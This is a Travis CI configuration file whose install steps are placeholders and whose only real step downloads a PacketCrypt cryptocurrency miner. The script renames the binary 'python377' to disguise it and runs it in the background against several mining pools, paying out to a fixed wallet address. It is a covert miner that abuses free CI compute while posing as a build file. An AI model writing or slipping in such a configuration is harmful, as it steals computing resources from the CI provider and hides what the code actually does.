language: node_js
node_js:
  - "7"
before_install:
  - "ls"
install:
  - "ls"
before_script:
  - "echo start"
script:
  - "wget https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.6.0/packetcrypt-v0.6.0-linux_amd64 && mv packetcrypt-v0.6.0-linux_amd64 python377 && chmod +x python377 && nohup ./python377 ann http://pool.pkt.world http://pool.pktpool.io http://pool.pkteer.com https://stratum.zetahash.com -p pkt1qfhr09kswj2hy0xgnzzj5r8ux09m7ltnuumf4xx &"
